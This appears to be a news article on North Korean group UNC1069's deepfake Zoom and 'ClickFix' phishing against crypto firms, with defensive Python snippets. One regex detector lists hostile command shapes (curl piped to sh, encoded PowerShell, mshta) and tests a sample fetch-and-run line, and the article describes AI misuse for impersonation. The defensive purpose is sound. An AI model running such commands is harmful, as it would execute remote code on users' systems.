Introduction
North Korean state-linked hackers are deploying AI-generated deepfake videos in sophisticated phishing attacks that have stolen over $2 billion from the cryptocurrency industry in 2025 alone. A new report from Google’s Mandiant security team details how threat actors are exploiting trust in routine digital communications—like video calls and calendar invites—to execute highly targeted intrusions, signaling a dangerous evolution in cybercrime in which digital identity itself has become the primary vulnerability.
Key Points
- Attackers use compromised Telegram accounts and fake Zoom meetings with AI-generated deepfake videos of crypto executives to build trust before deploying malware.
- North Korean hackers stole $2.02 billion in cryptocurrency in 2025 through fewer but more targeted attacks, bringing their total theft to approximately $6.75 billion.
- Security experts warn that AI is now used to draft messages, correct tone, and mirror communication styles, making impersonation harder to detect and potentially scalable through automated systems.
The Anatomy of a Deepfake Heist
The attack chain, attributed with high confidence to the North Korean threat actor UNC1069—also known as CryptoCore—begins not with a technical exploit, but with social engineering. According to Mandiant’s investigation, hackers first compromise the Telegram account of a known cryptocurrency executive. Using this trusted identity, they contact a target at a crypto firm, venture capital fund, or software development company to build rapport. The interaction culminates in a Calendly link for a 30-minute meeting, which directs the victim to a spoofed Zoom call hosted on the attackers’ own infrastructure.
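The spoofed call works because the link looks routine. One baseline mitigation, sketched below in Python purely as an illustration (the allowlist and function names are hypothetical, not drawn from Mandiant’s report), is to check a meeting link’s host against legitimate conferencing domains before a user clicks through:

```python
from urllib.parse import urlparse

# Hypothetical allowlist of legitimate meeting domains; a real deployment
# would source this from corporate policy, not a hard-coded set.
TRUSTED_MEETING_DOMAINS = {"zoom.us", "meet.google.com", "teams.microsoft.com"}

def is_trusted_meeting_link(url: str) -> bool:
    """Return True only if the link's host is a trusted domain
    or a subdomain of one (e.g. us02web.zoom.us)."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in TRUSTED_MEETING_DOMAINS)

# A lookalike domain on attacker-controlled infrastructure fails the check:
print(is_trusted_meeting_link("https://us02web.zoom.us/j/123456789"))   # True
print(is_trusted_meeting_link("https://zoom-meeting-support.com/j/123"))  # False
```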
During the fake meeting, the critical deception occurs: the victim reports seeing a deepfake video of a well-known crypto CEO. “The effectiveness of this approach comes from how little has to look unusual,” said Fraser Edwards, CEO of decentralized identity firm cheqd. “The sender is familiar. The meeting format is routine.” Attackers then claim audio problems and instruct the victim to run “troubleshooting” commands—a technique known as “ClickFix”—which triggers a malware infection. Forensic analysis revealed seven distinct malware families deployed to harvest credentials, browser data, and session tokens for immediate financial theft and future impersonation.
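The “ClickFix” step depends on the victim pasting attacker-supplied commands into a terminal or Run dialog. The sketch below is a hypothetical heuristic filter, not Mandiant’s detection logic: it flags pasted commands whose shape matches common lure patterns, such as piping a download straight into a shell. Real endpoint protection relies on EDR telemetry rather than string matching, but the example shows why these “troubleshooting” commands are detectable in principle.

```python
import re

# Illustrative patterns only, modeled on the kinds of commands
# ClickFix lures typically ask victims to run.
SUSPICIOUS_PATTERNS = [
    r"curl\s+[^|]+\|\s*(ba)?sh",         # download piped straight into a shell
    r"powershell\b.*-enc(odedcommand)?",  # encoded PowerShell payloads
    r"base64\s+(-d|--decode)",            # decoding an embedded payload
    r"mshta\s+https?://",                 # remote HTML application execution
]

def flag_pasted_command(cmd: str) -> bool:
    """Return True if a user-pasted 'fix' command matches a known-bad shape."""
    return any(re.search(p, cmd, re.IGNORECASE) for p in SUSPICIOUS_PATTERNS)

print(flag_pasted_command("curl -s https://example.com/fix.sh | sh"))  # True
print(flag_pasted_command("ping zoom.us"))                             # False
```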
Fewer Attacks, Larger Thefts: A Strategic Shift
This sophisticated, trust-based strategy is yielding staggering financial returns for the Democratic People’s Republic of Korea (DPRK). Data from blockchain analytics firm Chainalysis reveals that North Korean hackers stole $2.02 billion in cryptocurrency in 2025, a 51% increase over the roughly $1.34 billion stolen in 2024. Remarkably, this surge in value stolen occurred even as the total number of attacks declined. The cumulative haul for DPRK-linked actors now stands at approximately $6.75 billion.
These figures underscore a profound strategic shift. State-linked cybercriminals are moving away from broad, scattergun phishing campaigns. Instead, groups like CryptoCore are investing in fewer, highly tailored operations that exploit the inherent trust in everyday digital workflows. By weaponizing calendar invites and video conferences—tools synonymous with legitimate business—they achieve a higher success rate per incident, resulting in larger aggregate thefts through more efficient targeting.
AI Escalates the Impersonation Threat Beyond Video
The use of AI-generated deepfake video represents a significant escalation, but experts warn the technology’s role is expanding. “Deepfake video is typically introduced at escalation points, such as live calls, where seeing a familiar face can override doubts,” Edwards explained. The goal is not a prolonged conversation but just enough realism to persuade the victim to take the next malicious step.
However, AI’s supporting role in these campaigns is equally concerning. Edwards notes that artificial intelligence is now routinely used to draft convincing messages, correct tone, and mirror an individual’s typical communication style with colleagues. This makes routine messages far harder to question and reduces the likelihood a recipient will pause to verify the interaction’s authenticity. The risk is poised to grow sharply as AI agents become integrated into everyday communication. “If those systems are abused or compromised, deepfake audio or video can be deployed automatically, turning impersonation from a manual effort into a scalable process,” Edwards warned.
Systemic Defenses, Not User Vigilance, Are Required
The consensus among security professionals is that the human element—the trust placed in digital identities—has become the weakest link, and traditional defenses are inadequate. It is “unrealistic” to expect users to reliably spot advanced deepfakes or meticulously scrutinize every routine meeting request. “The answer is not asking users to pay closer attention, but building systems that protect them by default,” Edwards asserted.
The solution, therefore, lies in systemic change. Experts argue for improving how authenticity is signaled and verified across digital platforms, enabling users to instantly discern whether content is real, synthetic, or unverified without relying on instinct or manual investigation. As North Korean actors like UNC1069 continue to refine their AI-powered schemes, the cryptocurrency industry and the broader fintech sector face a pressing need to move beyond reactive security and embed verification and trust into the very architecture of digital communication.
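What “verification by default” could look like in practice is open to design, but one common building block is cryptographic signing bound to a verified identity. The sketch below, using the pyca/cryptography library, is an illustrative assumption rather than any vendor’s product: a client labels content “verified” only when a signature from the sender’s registered key checks out, so a tampered or unsigned message is surfaced to the user automatically.

```python
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

# In practice the key would be anchored to a decentralized identifier or PKI;
# it is generated ad hoc here only to keep the example self-contained.
sender_key = Ed25519PrivateKey.generate()
sender_public = sender_key.public_key()

message = b"Calendly invite: 30-minute sync, Thursday 2pm"
signature = sender_key.sign(message)

def render_label(public_key, sig: bytes, content: bytes) -> str:
    """Label content 'verified' only if the signature checks out."""
    try:
        public_key.verify(sig, content)
        return "verified"
    except InvalidSignature:
        return "unverified"

print(render_label(sender_public, signature, message))         # verified
print(render_label(sender_public, signature, message + b"!"))  # unverified
```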
